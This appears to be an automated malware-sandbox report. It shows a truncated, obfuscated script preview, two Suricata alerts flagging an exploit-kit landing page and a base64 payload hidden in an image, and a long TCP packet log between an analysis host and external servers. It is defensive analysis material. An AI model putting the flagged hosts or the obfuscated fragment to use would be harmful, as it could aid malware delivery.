File Content Preview:	.. .v.a.r. .n.i.H.c.Q.B.P.N.L.S.C.N.N.z.K.L.l.m.I.A.T.U.p.L.k.N.u.Q.c.q.k.O.b.z.T.f.W.W.c.G.N.u.O.L.K.L.x.G.K.s.b.i.x.q.h.W.k.f.t.z.x.P.W.p.k.p.o.Q.x.U.i.i.x.i.j.I.h.t.B.L.N.g.L.o.I.m.K.c.k.R.B.W.G.n.R.c.W.P.L.d.Q.K.b.P.L.R.U.B.G.L.W.e.G.a.A.W.p.j.o.L.c.j

File Icon


Icon Hash:	68d69b8bb6aa9a86

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Severity	Source Port	Dest Port	Source IP	Dest IP
2024-08-30T09:28:02.731307+0200	TCP	2020423	ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1	1	443	49731	78.142.208.13	192.168.2.4
2024-08-30T09:28:00.364366+0200	TCP	2049038	ET MALWARE Malicious Base64 Encoded Payload In Image	1	443	49730	207.241.227.86	192.168.2.4

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 30, 2024 09:27:58.020114899 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:58.020179033 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:58.020297050 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:58.038661003 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:58.038687944 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:58.636185884 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:58.636352062 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:58.640115976 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:58.640129089 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:58.640414953 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:58.653256893 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:58.700505972 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:58.920955896 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:58.920990944 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:58.921017885 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:58.921045065 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:58.921060085 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:58.921113014 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:58.944952965 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:58.944987059 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:58.945050001 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:58.945060015 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:58.945102930 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:58.945117950 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:58.986305952 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:58.986332893 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:58.986450911 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:58.986468077 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:58.986543894 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.033078909 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.033107042 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.033205986 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.033217907 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.033293962 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.034377098 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.034392118 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.034461975 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.034471989 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.034517050 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.036190987 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.036206007 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.036277056 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.036293030 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.036339045 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.098114967 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.098151922 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.098403931 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.098414898 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.098462105 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.126043081 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.126087904 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.126271963 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.126281977 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.126336098 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.126342058 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.126358986 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.126394033 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.126401901 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.126410007 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.126450062 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.127576113 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.127604961 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.127682924 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.127695084 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.127707958 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.127737999 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.140470982 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.140510082 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.140676975 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.140687943 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.140729904 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.186912060 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.186939001 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.187176943 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.187186003 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.187325954 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.187350035 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.187623024 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.187630892 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.187680960 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.210350990 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.210388899 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.210573912 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.210582972 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.210728884 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.210983038 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.211000919 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.211066961 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.211075068 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.211119890 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.211987972 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.212007046 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.212064981 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.212070942 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.212112904 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.214950085 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.214968920 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.215064049 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.215070963 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.215137959 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.215210915 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.215226889 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.215302944 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.215308905 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.215361118 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.232661963 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.232692003 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.232882977 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.232894897 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.233043909 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.275405884 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.275428057 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.275717020 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.275723934 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.275779009 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.299828053 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.299849033 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.300075054 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.300081968 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.300133944 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.300148964 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.300167084 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.300204992 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.300209999 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.300241947 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.300261974 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.300529957 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.300544977 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.300592899 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.300601959 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.300627947 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.300649881 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.301141977 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.301157951 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.301201105 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.301208019 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.301235914 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.301258087 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.301441908 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.301459074 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.301506042 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.301512003 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.301552057 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.302062988 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.302082062 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.302165031 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.302170992 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.302218914 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.321157932 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.321178913 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.321322918 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.321336031 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.321475983 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.364820957 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.364842892 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.365077019 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.365077019 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.365092993 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.365145922 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.388649940 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.388674021 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.388834000 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.388847113 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.388941050 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.388971090 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.388986111 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.388989925 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.388999939 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.389036894 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.389173985 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.389189005 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.389244080 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.389251947 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.389297962 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.389550924 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.389564991 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.389632940 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.389637947 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.389681101 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.390055895 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.390069962 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.390147924 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.390151978 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.390165091 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.390201092 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.390316963 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.390335083 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.390384912 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.390389919 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.390436888 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.391509056 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.409837008 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.409867048 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.409991026 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.409998894 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.410077095 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.453824997 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.453852892 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.454076052 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.454087019 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.454142094 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.477649927 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.477674961 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.477756023 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.477772951 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.477823019 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.478267908 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.478293896 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.478353024 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.478362083 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.478387117 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.478410959 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.478571892 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.478595972 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.478648901 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.478655100 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.478693008 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.479026079 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.479044914 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.479108095 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.479114056 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.479160070 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.479743958 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.479763031 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.479820013 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.479825974 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.479855061 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.479872942 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.479913950 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.479938030 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.479965925 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.479969978 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.479998112 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.480012894 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.481703043 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.500051022 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.500087023 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.500148058 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.500165939 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.500205040 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.500246048 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.543504953 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.543533087 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.543678999 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.543703079 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.543750048 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.566224098 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.566253901 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.566387892 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.566401005 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.566448927 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.567473888 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.567496061 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.567575932 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.567584991 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.567630053 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.568670988 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.568715096 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.568742990 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.568747997 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.568798065 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.568816900 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.569330931 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.569345951 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.569401026 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.569405079 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.569442034 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.569451094 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.569982052 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.569999933 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.570055008 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.570060015 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.570101976 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.570331097 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.570346117 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.570406914 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.570410967 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.570456028 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.583034992 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.587044954 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.587065935 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.587162018 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.587176085 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.587220907 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.630829096 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.630856037 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.630939960 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.630950928 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.630991936 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.654352903 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.654376984 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.654494047 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.654509068 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.654553890 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.655466080 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.655482054 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.655567884 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.655574083 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.655632973 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.655786037 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.655801058 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.655841112 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.655846119 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.655874014 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.655896902 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.656101942 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.656116009 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.656178951 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.656183958 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.656220913 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.656585932 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.656599998 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.656650066 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.656653881 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.656680107 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.656701088 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.656936884 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.656951904 CEST	443	49730	207.241.227.86	192.168.2.4
Aug 30, 2024 09:27:59.656992912 CEST	49730	443	192.168.2.4	207.241.227.86
Aug 30, 2024 09:27:59.656996965 CEST	443	49730	207.241.227.86	192.168.2.4
